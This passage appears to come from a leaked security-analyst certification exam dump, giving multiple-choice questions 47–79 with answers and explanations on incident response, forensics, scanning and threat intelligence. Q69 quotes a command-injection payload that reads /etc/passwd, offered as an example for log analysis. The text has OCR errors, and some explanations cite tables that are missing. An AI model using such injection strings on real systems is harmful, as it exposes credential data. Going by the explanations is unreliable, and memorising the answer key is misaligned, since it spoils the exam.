OSSTMM B. SIEM C. SOAR D. QVVASP Answer: C Explanation: SOAR stands for security orchestration, automation, and response, which is a term that describes a set of tools, technologies, or platforms that can help streamline, standardize, and automate security operations and incident response processes and tasks. SOAR can help minimize human engagement and aid in process improvement in security operations by reducing manual work, human errors, response time, or complexity. SOAR can also help enhance collaboration, coordination, efficiency, or effectiveness of security operations and incident response teams. Question: 48 After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too high. The CISO refused the software request. Which of the following risk management principles did the CISO select? www.P2PExams.com Questions & Answers PDF P-28 P- A. Avoid B. Transfer C. Accept D. Mitigate Answer: A Explanation: Avoid is a risk management principle that describes the decision or action of not engaging in an activity or accepting a risk that is deemed too high or unacceptable. Avoiding a risk can eliminate the possibility or impact of the risk, as well as the need for any further risk management actions. In this case, the CISO decided the risk score would be too high and refused the software request. This indicates that the CISO selected the avoid principle for risk management. Question: 49 Which of the following is an important aspect that should be included in the lessons-learned step after an incident? A. Identify any improvements or changes in the incident response plan or procedures B. Determine if an internal mistake was made and who did it so they do not repeat the error C. Present all legal evidence collected and turn it over to iaw enforcement D. Discuss the financial impact of the incident to determine if security controls are well spent Answer: A Explanation: An important aspect that should be included in the lessons-learned step after an incident is to identify any improvements or changes in the incident response plan or procedures. The lessons- learned step is a process that involves reviewing and evaluating the incident response activities and outcomes, as well as identifying and documenting any strengths, weaknesses, gaps, or best practices. Identifying any improvements or changes in the incident response plan or procedures can help enhance the security posture, readiness, or capability of the organization for future incidents Question: 50 The security operations team is required to consolidate several threat intelligence feeds due to redundant tools and portals. Which of the following will best achieve the goal and maximize results? A. Single pane of glass B. Single sign-on C. Data enrichment D. Deduplication Answer: D Explanation: www.P2PExams.com Questions & Answers PDF P-29 P- Deduplication is a process that involves removing any duplicate or redundant data or information from a data set or source. Deduplication can help consolidate several threat intelligence feeds by eliminating any overlapping or repeated indicators of compromise (IoCs), alerts, reports, or recommendations. Deduplication can also help reduce the volume and complexity of threat intelligence data, as well as improve its quality, accuracy, or relevance. Question: 51 Which of the following would a security analyst most likely use to compare TTPs between different known adversaries of an organization? A. MITRE ATTACK B. Cyber Kill Cham C. OWASP D. STIXTAXII Answer: A Explanation: MITRE ATT&CK is a framework and knowledge base that describes the tactics, techniques, and procedures (TTPs) used by various adversaries in cyberattacks. MITRE ATT&CK can help security analysts compare TTPs between different known adversaries of an organization, as well as identify patterns, gaps, or trends in adversary behavior. MITRE ATT&CK can also help security analysts improve threat detection, analysis, and response capabilities, as well as share threat intelligence with other organizations or communities Question: 52 An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system. Which of the following steps of the process does this describe? A. Eradication B. Recovery C. Containment D. Preparation Answer: A Explanation: Eradication is a step in the incident response process that involves removing any traces or remnants of the incident from the affected systems or networks, such as malware, backdoors, compromised accounts, or malicious files. Eradication also involves restoring the systems or networks to their normal or secure state, as well as verifying that the incident is completely eliminated and cannot recur. In this case, the analyst is remediating items associated with a recent incident by isolating the vulnerability and actively removing it from the system. This describes the eradication step of the incident response process. www.P2PExams.com Questions & Answers PDF P-30 P- Question: 53 Joe, a leading sales person at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with his current employer. Joe is soliciting his current employer's customers. However, Joe has not resigned or discussed this with his current supervisor yet. Which of the following would be the best action for the incident response team to recommend? A. Isolate Joe's PC from the network B. Reimage the PC based on standard operating procedures C. Initiate a remote wipe of Joe's PC using mobile device management D. Perform no action until HR or legal counsel advises on next steps Answer: D Explanation: The best action for the incident response team to recommend in this scenario is to perform no action until HR or legal counsel advises on next steps. This action can help avoid any potential legal or ethical issues, such as violating employee privacy rights, contractual obligations, or organizational policies. This action can also help ensure that any evidence or information collected from the employee’s system or network is admissible and valid in case of any legal action or dispute. The incident response team should consult with HR or legal counsel before taking any action that may affect the employee’s system or network. Question: 54 The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security team is required to come up with priorities for the program. Which of the following is the best priority based on common attack frameworks? A. Reduce the administrator and privileged access accounts B. Employ a network-based IDS C. Conduct thorough incident response D. Enable SSO to enterprise applications Answer: A Explanation: The best priority based on common attack frameworks for a new program to reduce attack surface risks and threats as part of a zero trust approach is to reduce the administrator and privileged access accounts. Administrator and privileged access accounts are accounts that have elevated permissions or capabilities to perform sensitive or critical tasks on systems or networks, such as installing software, changing configurations, accessing data, or granting access. Reducing the administrator and privileged access accounts can help minimize the attack surface, as it can limit the number of potential targets or entry points for attackers, as well as reduce the impact or damage of an attack if an account is compromised. www.P2PExams.com Questions & Answers PDF P-31 P- Question: 55 During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner and the server was up to date and configured with appropriate auditing and logging. The Chief Information Security Officer wants to find out precisely what happened. Which of the following actions should the analyst take first? A. Clone the virtual server for forensic analysis B. Log in to the affected server and begin analysis of the logs C. Restore from the last known-good backup to confirm there was no loss of connectivity D. Shut down the affected server immediately Answer: A Explanation: The first action that the analyst should take in this case is to clone the virtual server for forensic analysis. Cloning the virtual server involves creating an exact copy or image of the server’s data and state at a specific point in time. Cloning the virtual server can help preserve and protect any evidence or information related to the security incident, as well as prevent any tampering, contamination, or destruction of evidence. Cloning the virtual server can also allow the analyst to safely analyze and investigate the incident without affecting the original server or its operations. Question: 56 A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a public IP address. The server should not be making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around the clock during work hours as well. Which of the following is the most likely explanation? A. C2 beaconing activity B. Data exfiltration C. Anomalous activity on unexpected ports D. Network host IP address scanning E. A rogue network device Answer: A Explanation: The most likely explanation for this traffic pattern is C2 beaconing activity. C2 stands for command and control, which is a phase of the Cyber Kill Chain that involves the adversary attempting to establish communication with a successfully exploited target. C2 beaconing activity is a type of network traffic that indicates a compromised system is sending periodic messages or signals to an attacker’s system using various protocols, such as HTTP(S), DNS, ICMP, or UDP. C2 beaconing activity can enable the attacker to remotely control or manipulate the target system or network using various methods, such as malware callbacks, backdoors, botnets, or covert channels. www.P2PExams.com Questions & Answers PDF P-32 P- Question: 57 New employees in an organization have been consistently plugging in personal webcams despite the company policy prohibiting use of personal devices. The SOC manager discovers that new employees are not aware of the company policy. Which of the following will the SOC manager most likely recommend to help ensure new employees are accountable for following the company policy? A. Human resources must email a copy of a user agreement to all new employees B. Supervisors must get verbal confirmation from new employees indicating they have read the user agreement C. All new employees must take a test about the company security policy during the cjitoardmg process D. All new employees must sign a user agreement to acknowledge the company security policy Answer: D Explanation: The best action that the SOC manager can recommend to help ensure new employees are accountable for following the company policy is to require all new employees to sign a user agreement to acknowledge the company security policy. A user agreement is a document that defines the rights and responsibilities of the users regarding the use of the company’s systems, networks, or resources, as well as the consequences of violating the company’s security policy. Signing a user agreement can help ensure new employees are aware of and agree to comply with the company security policy, as well as hold them accountable for any breaches or incidents caused by their actions or inactions. Question: 58 An analyst has been asked to validate the potential risk of a new ransomware campaign that the Chief Financial Officer read about in the newspaper. The company is a manufacturer of a very small spring used in the newest fighter jet and is a critical piece of the supply chain for this aircraft. Which of the following would be the best threat intelligence source to learn about this new campaign? A. Information sharing organization B. Blogs/forums C. Cybersecuritv incident response team D. Deep/dark web Answer: A Explanation: An information sharing organization is a group or network of organizations that share threat intelligence, best practices, or lessons learned related to cybersecurity issues or incidents. An information sharing organization can help security analysts learn about new ransomware campaigns or other emerging threats, as well as get recommendations or guidance on how to prevent, detect, or respond to them. An information sharing organization can also help security analysts collaborate www.P2PExams.com Questions & Answers PDF P-33 P- or coordinate with other organizations in the same industry or region that may face similar threats or challenges. Question: 59 An incident response team finished responding to a significant security incident. The management team has asked the lead analyst to provide an after-action report that includes lessons learned. Which of the following is the most likely reason to include lessons learned? A. To satisfy regulatory requirements for incident reporting B. To hold other departments accountable C. To identify areas of improvement in the incident response process D. To highlight the notable practices of the organization's incident response team Answer: C Explanation: The most likely reason to include lessons learned in an after-action report is to identify areas of improvement in the incident response process. The lessons learned process is a way of reviewing and evaluating the incident response activities and outcomes, as well as identifying and documenting any strengths, weaknesses, gaps, or best practices. Identifying areas of improvement in the incident response process can help enhance the security posture, readiness, or capability of the organization for future incidents, as well as provide feedback or recommendations on how to address any issues or challenges. Question: 60 A vulnerability management team is unable to patch all vulnerabilities found during their weekly scans. Using the third-party scoring system described below, the team patches the most urgent vulnerabilities: Additionally, the vulnerability management team feels that the metrics Smear and Channing are less important than the others, so these will be lower in priority. Which of the following vulnerabilities should be patched first, given the above third-party scoring system? www.P2PExams.com Questions & Answers PDF P-34 P- A. InLoud: Cobain: Yes Grohl: No Novo: Yes Smear: Yes Channing: No B. TSpirit: Cobain: Yes Grohl: Yes Novo: Yes Smear: No Channing: No C. ENameless: Cobain: Yes Grohl: No Novo: Yes Smear: No Channing: No D. PBleach: Cobain: Yes Grohl: No Novo: No Smear: No Channing: Yes Answer: B Explanation: The vulnerability that should be patched first, given the above third-party scoring system, is: TSpirit: Cobain: Yes Grohl: Yes Novo: Yes Smear: No Channing: No This vulnerability has three out of five metrics marked as Yes, which indicates a high severity level. The metrics Cobain, Grohl, and Novo are more important than Smear and Channing, according to the vulnerability management team. Therefore, this vulnerability poses a greater risk than the other vulnerabilities and should be patched first. Question: 61 A user downloads software that contains malware onto a computer that eventually infects numerous other systems. Which of the following has the user become? A. Hacklivist B. Advanced persistent threat C. Insider threat D. Script kiddie www.P2PExams.com Questions & Answers PDF P-35 P- Answer: C Explanation: The user has become an insider threat by downloading software that contains malware onto a computer that eventually infects numerous other systems. An insider threat is a person or entity that has legitimate access to an organization’s systems, networks, or resources and uses that access to cause harm or damage to the organization. An insider threat can be intentional or unintentional, malicious or negligent, and can result from various actions or behaviors, such as downloading unauthorized software, violating security policies, stealing data, sabotaging systems, or collaborating with external attackers. Question: 62 An organization has activated the CSIRT. A security analyst believes a single virtual server was compromised and immediately isolated from the network. Which of the following should the CSIRT conduct next? A. Take a snapshot of the compromised server and verify its integrity B. Restore the affected server to remove any malware C. Contact the appropriate government agency to investigate D. Research the malware strain to perform attribution Answer: A Explanation: The next action that the CSIRT should conduct after isolating the compromised server from the network is to take a snapshot of the compromised server and verify its integrity. Taking a snapshot of the compromised server involves creating an exact copy or image of the server’s data and state at a specific point in time. Verifying its integrity involves ensuring that the snapshot has not been altered, corrupted, or tampered with during or after its creation. Taking a snapshot and verifying its integrity can help preserve and protect any evidence or information related to the incident, as well as prevent any tampering, contamination, or destruction of evidence. Question: 63 During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related to its volatility level? A. Disk contents B. Backup data C. Temporary files D. Running processes Answer: D Explanation: The most volatile type of evidence that must be collected first in a computer system is running www.P2PExams.com Questions & Answers PDF P-36 P- processes. Running processes are programs or applications that are currently executing on a computer system and using its resources, such as memory, CPU, disk space, or network bandwidth. Running processes are very volatile because they can change rapidly or disappear completely when the system is shut down, rebooted, logged off, or crashed. Running processes can also be affected by other processes or users that may modify or terminate them. Therefore, running processes must be collected first before any other type of evidence in a computer system Question: 64 A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region. Which of the following shell script functions could help achieve the goal? A. function w() { a=$(ping -c 1 $1 | awk-F ”/” ’END{print $1}’) && echo “$1 | $a” } B. function x() { b=traceroute -m 40 $1 | awk ’END{print $1}’) && echo “$1 | $b” } C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”.in-addr” ’{print $1}’).origin.asn.cymru.com TXT +short } D. function z() { c=$(geoiplookup$1) && echo “$1 | $c” } Answer: C Explanation: The shell script function that could help identify possible network addresses from different source networks belonging to the same company and region is: function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”.in-addr” ’{print $1}’).origin.asn.cymru.com TXT +short } This function takes an IP address as an argument and performs two DNS lookups using the dig command. The first lookup uses the -x option to perform a reverse DNS lookup and get the hostname associated with the IP address. The second lookup uses the origin.asn.cymru.com domain to get the autonomous system number (ASN) and other information related to the IP address, such as the country code, registry, or allocation date. The function then prints the IP address and the ASN information, which can help identify any network addresses that belong to the same ASN or region Question: 65 A security analyst is writing a shell script to identify IP addresses from the same country. Which of the following functions would help the analyst achieve the objective? A. function w() { info=$(ping -c 1 $1 | awk -F “/” ‘END{print $1}’) && echo “$1 | $info” } B. function x() { info=$(geoiplookup $1) && echo “$1 | $info” } C. function y() { info=$(dig -x $1 | grep PTR | tail -n 1 ) && echo “$1 | $info” } D. function z() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo “$1 | $info” } Answer: B Explanation: www.P2PExams.com Questions & Answers PDF P-37 P- The function that would help the analyst identify IP addresses from the same country is: function x() { info=$(geoiplookup $1) && echo “$1 | $info” } This function takes an IP address as an argument and uses the geoiplookup command to get the geographic location information associated with the IP address, such as the country name, country code, region, city, or latitude and longitude. The function then prints the IP address and the geographic location information, which can help identify any IP addresses that belong to the same country. Question: 66 A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the environment: Which of the following should be completed first to remediate the findings? A. Ask the web development team to update the page contents B. Add the IP address allow listing for control panel access C. Purchase an appropriate certificate from a trusted root CA D. Perform proper sanitization on all fields Answer: D Explanation: The first action that should be completed to remediate the findings is to perform proper sanitization on all fields. Sanitization is a process that involves validating, filtering, or encoding any user input or data before processing or storing it on a system or application. Sanitization can help prevent various types of attacks, such as cross-site scripting (XSS), SQL injection, or command injection, that exploit unsanitized input or data to execute malicious scripts, commands, or queries on a system or application. Performing proper sanitization on all fields can help address the most critical and common vulnerability found during the vulnerability assessment, which is XSS. Question: 67 www.P2PExams.com Questions & Answers PDF P-38 P- A SOC analyst identifies the following content while examining the output of a debugger command over a client-server application: getconnection (database01, "alpha " , "AXTV. 127GdCx94GTd") ; Which of the following is the most likely vulnerability in this system? A. Lack of input validation B. SQL injection C. Hard-coded credential D. Buffer overflow attacks Answer: C Explanation: The most likely vulnerability in this system is hard-coded credential. Hard-coded credential is a practice of embedding or storing a username, password, or other sensitive information in the source code or configuration file of a system or application. Hard-coded credential can pose a serious security risk, as it can expose the system or application to unauthorized access, data theft, or compromise if the credential is discovered or leaked by an attacker. Hard-coded credential can also make it difficult to change or update the credential if needed, as it may require modifying the code or file and redeploying the system or application. Question: 68 A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The proxy is sitting in a rack and is not being used, as the company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8. Which of the following best practices should the company follow with this proxy? A. Leave the proxy as is. B. Decomission the proxy. C. Migrate the proxy to the cloud. D. Patch the proxy Answer: B Explanation: The best practice that the company should follow with this proxy is to decommission the proxy. Decommissioning the proxy involves removing or disposing of the proxy from the rack and the network, as well as deleting or wiping any data or configuration on the proxy. Decommissioning the proxy can help eliminate the vulnerability on the proxy, as well as reduce the attack surface, complexity, or cost of maintaining the network. Decommissioning the proxy can also free up space or resources for other devices or systems that are in use or needed by the company. Question: 69 www.P2PExams.com Questions & Answers PDF P-39 P- A zero-day command injection vulnerability was published. A security administrator is analyzing the following logs for evidence of adversaries attempting to exploit the vulnerability: Which of the following log entries provides evidence of the attempted exploit? A. Log entry 1 B. Log entry 2 C. Log entry 3 D. Log entry 4 Answer: D Explanation: Log entry 4 shows an attempt to exploit the zero-day command injection vulnerability by appending a malicious command (;cat /etc/passwd) to the end of a legitimate request (/cgi- bin/index.cgi?name=John). This command would try to read the contents of the /etc/passwd file, which contains user account information, and could lead to further compromise of the system. The other log entries do not show any signs of command injection, as they do not contain any special characters or commands that could alter the intended behavior of the application. Official Reference: https://www.imperva.com/learn/application-security/command-injection/ https://www.zerodayinitiative.com/advisories/published/ Question: 70 Which of the following is the most important factor to ensure accurate incident response reporting? A. A well-defined timeline of the events B. A guideline for regulatory reporting C. Logs from the impacted system D. A well-developed executive summary Answer: A Explanation: www.P2PExams.com Questions & Answers PDF P-40 P- A well-defined timeline of the events is the most important factor to ensure accurate incident response reporting, as it provides a clear and chronological account of what happened, when it happened, who was involved, and what actions were taken. A timeline helps to identify the root cause of the incident, the impact and scope of the damage, the effectiveness of the response, and the lessons learned for future improvement. A timeline also helps to communicate the incident to relevant stakeholders, such as management, legal, regulatory, or media entities. The other factors are also important for incident response reporting, but they are not as essential as a well-defined timeline. Official Reference: https://www.ibm.com/topics/incident-response https://www.crowdstrike.com/cybersecurity-101/incident-response/incident-response-steps/ Question: 71 A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is the best mitigation technique? A. Geoblock the offending source country B. Block the IP range of the scans at the network firewall. C. Perform a historical trend analysis and look for similar scanning activity. D. Block the specific IP address of the scans at the network firewall Answer: A Explanation: Geoblocking is the best mitigation technique for unusual network scanning activity coming from a country that the company does not do business with, as it can prevent any potential attacks or data breaches from that country. Geoblocking is the practice of restricting access to websites or services based on geographic location, usually by blocking IP addresses associated with a certain country or region. Geoblocking can help reduce the overall attack surface and protect against malicious actors who may be trying to exploit vulnerabilities or steal information. The other options are not as effective as geoblocking, as they may not block all the possible sources of the scanning activity, or they may not address the root cause of the problem. Official Reference: https://www.blumira.com/geoblocking/ https://www.avg.com/en/signal/geo-blocking Question: 72 An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the following is the best step to preserve evidence? A. Disable the user's network account and access to web resources B. Make a copy of the files as a backup on the server. www.P2PExams.com Questions & Answers PDF P-41 P- C. Place a legal hold on the device and the user's network share. D. Make a forensic image of the device and create a SRA-I hash. Answer: D Explanation: Making a forensic image of the device and creating a SRA-I hash is the best step to preserve evidence, as it creates an exact copy of the device’s data and verifies its integrity. A forensic image is a bit-by-bit copy of the device’s storage media, which preserves all the information on the device, including deleted or hidden files. A SRA-I hash is a cryptographic value that is calculated from the forensic image, which can be used to prove that the image has not been altered or tampered with. The other options are not as effective as making a forensic image and creating a SRA-I hash, as they may not capture all the relevant data, or they may not provide sufficient verification of the evidence’s authenticity. Official Reference: https://www.sans.org/blog/forensics-101-acquiring-an-image-with-ftk-imager/ https://swailescomputerforensics.com/digital-forensics-imaging-hash-value/ Question: 73 Patches for two highly exploited vulnerabilities were released on the same Friday afternoon. Information about the systems and vulnerabilities is shown in the tables below: Which of the following should the security analyst prioritize for remediation? A. rogers B. brady C. brees D. manning www.P2PExams.com Questions & Answers PDF P-42 P- Answer: B Explanation: Brady should be prioritized for remediation, as it has the highest risk score and the highest number of affected users. The risk score is calculated by multiplying the CVSS score by the exposure factor, which is the percentage of systems that are vulnerable to the exploit. Brady has a risk score of 9 x 0.8 = 7.2, which is higher than any other system. Brady also has 500 affected users, which is more than any other system. Therefore, patching brady would reduce the most risk and impact for the organization. The other systems have lower risk scores and lower numbers of affected users, so they can be remediated later. Question: 74 A security analyst is validating a particular finding that was reported in a web application vulnerability scan to make sure it is not a false positive. The security analyst uses the snippet below: Which of the following vulnerability types is the security analyst validating? A. Directory traversal B. XSS C. XXE D. SSRF Answer: B Explanation: XSS (cross-site scripting) is the vulnerability type that the security analyst is validating, as the snippet shows an attempt to inject a script tag into the web application. XSS is a web security vulnerability that allows an attacker to execute arbitrary JavaScript code in the browser of another user who visits the vulnerable website. XSS can be used to perform various malicious actions, such as stealing cookies, session hijacking, phishing, or defacing websites. The other vulnerability types are not relevant to the snippet, as they involve different kinds of attacks. Directory traversal is an attack that allows an attacker to access files and directories that are outside of the web root folder. XXE (XML external entity) injection is an attack that allows an attacker to interfere with an application’s processing of XML data, and potentially access files or systems. SSRF (server-side request forgery) is an attack that allows an attacker to induce the server-side application to make requests to an unintended location. Official Reference: https://portswigger.net/web-security/xxe www.P2PExams.com Questions & Answers PDF P-43 P- https://portswigger.net/web-security/ssrf https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_ Sheet.html Question: 75 During a cybersecurity incident, one of the web servers at the perimeter network was affected by ransomware. Which of the following actions should be performed immediately? A. Shut down the server. B. Reimage the server C. Quarantine the server D. Update the OS to latest version. Answer: C Explanation: Quarantining the server is the best action to perform immediately, as it isolates the affected server from the rest of the network and prevents the ransomware from spreading to other systems or data. Quarantining the server also preserves the evidence of the ransomware attack, which can be useful for forensic analysis and law enforcement investigation. The other actions are not as urgent as quarantining the server, as they may not stop the ransomware infection, or they may destroy valuable evidence. Shutting down the server may not remove the ransomware, and it may trigger a data deletion mechanism by the ransomware. Reimaging the server may restore its functionality, but it will also erase any traces of the ransomware and make recovery of encrypted data impossible. Updating the OS to the latest version may fix some vulnerabilities, but it will not remove the ransomware or decrypt the data. Official Reference: https://www.cisa.gov/stopransomware/ransomware-guide https://www.cisa.gov/sites/default/files/publications/Ransomware_Executive_One- Pager_and_Technical_Document-FINAL.pdf https://www.cisa.gov/stopransomware/ive-been-hit-ransomware Question: 76 A security analyst is performing vulnerability scans on the network. The analyst installs a scanner appliance, configures the subnets to scan, and begins the scan of the network. Which of the following would be missing from a scan performed with this configuration? A. Operating system version B. Registry key values C. Open ports D. IP address www.P2PExams.com Questions & Answers PDF P-44 P- Answer: B Explanation: Registry key values would be missing from a scan performed with this configuration, as the scanner appliance would not have access to the Windows Registry of the scanned systems. The Windows Registry is a database that stores configuration settings and options for the operating system and installed applications. To scan the Registry, the scanner would need to have credentials to log in to the systems and run a local agent or script. The other items would not be missing from the scan, as they can be detected by the scanner appliance without credentials. Operating system version can be identified by analyzing service banners or fingerprinting techniques. Open ports can be discovered by performing a port scan or sending probes to common ports. IP address can be obtained by resolving the hostname or using network discovery tools. https://attack.mitre.org/techniques/T1112/ Question: 77 A security administrator has been notified by the IT operations department that some vulnerability reports contain an incomplete list of findings. Which of the following methods should be used to resolve this issue? A. Credentialed scan B. External scan C. Differential scan D. Network scan Answer: A Explanation: A credentialed scan is a type of vulnerability scan that uses valid credentials to log in to the scanned systems and perform a more thorough and accurate assessment of their vulnerabilities. A credentialed scan can access more information than a non-credentialed scan, such as registry keys, patch levels, configuration settings, and installed applications. A credentialed scan can also reduce the number of false positives and false negatives, as it can verify the actual state of the system rather than relying on inference or assumptions. The other types of scans are not related to the issue of incomplete findings, as they refer to different aspects of vulnerability scanning, such as the scope, location, or frequency of the scan. An external scan is a scan that is performed from outside the network perimeter, usually from the internet. An external scan can reveal how an attacker would see the network and what vulnerabilities are exposed to the public. An external scan cannot access internal systems or resources that are behind firewalls or other security controls. A differential scan is a scan that compares the results of two scans and highlights the differences between them. A differential scan can help identify changes in the network environment, such as new vulnerabilities, patched vulnerabilities, or new devices. A differential scan does not provide a complete list of findings by itself, but rather a summary of changes. A network scan is a scan that focuses on the network layer of the OSI model and detects vulnerabilities related to network devices, protocols, services, and configurations. A network scan can discover open ports, misconfigured firewalls, www.P2PExams.com Questions & Answers PDF P-45 P- unencrypted traffic, and other network-related issues. A network scan does not provide information about the application layer or the host layer of the OSI model, such as web applications or operating systems. Question: 78 A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an internal host to a blocklisted external server. Which of the following best describes the activity that is taking place? A. Data exfiltration B. Rogue device C. Scanning D. Beaconing Answer: D Explanation: Beaconing is the best term to describe the activity that is taking place, as it refers to the periodic communication between an infected host and a blocklisted external server. Beaconing is a common technique used by malware to establish a connection with a command-and-control (C2) server, which can provide instructions, updates, or exfiltration capabilities to the malware. Beaconing can vary in frequency, duration, and payload, depending on the type and sophistication of the malware. The other terms are not as accurate as beaconing, as they describe different aspects of malicious activity. Data exfiltration is the unauthorized transfer of data from a compromised system to an external destination, such as a C2 server or a cloud storage service. Data exfiltration can be a goal or a consequence of malware infection, but it does not necessarily involve blocklisted servers or consistent requests. Rogue device is a device that is connected to a network without authorization or proper security controls. Rogue devices can pose a security risk, as they can introduce malware, bypass firewalls, or access sensitive data. However, rogue devices are not necessarily infected with malware or communicating with blocklisted servers. Scanning is the process of probing a network or a system for vulnerabilities, open ports, services, or other information. Scanning can be performed by legitimate administrators or malicious actors, depending on the intent and authorization. Scanning does not imply consistent requests or blocklisted servers, as it can target any network or system. Question: 79 A technician is analyzing output from a popular network mapping tool for a PCI audit: www.P2PExams.com Questions & Answers PDF P-46 P- Which of the following best describes the output? A. The host is not up or responding. B. The host is running excessive cipher suites. C. The host is allowing insecure cipher suites. D. The Secure Shell port on this host is closed Answer: C Explanation: The output shows the result of running the ssl-enum-ciphers script with Nmap, which is a tool that can scan web servers for supported SSL/TLS cipher suites. Cipher suites are combinations of www.P2PExams.com Questions & Answers PDF P-47 P- cryptographic algorithms that are used to establish secure communication between a client and a server. The output shows the cipher suites that are supported by the server, along w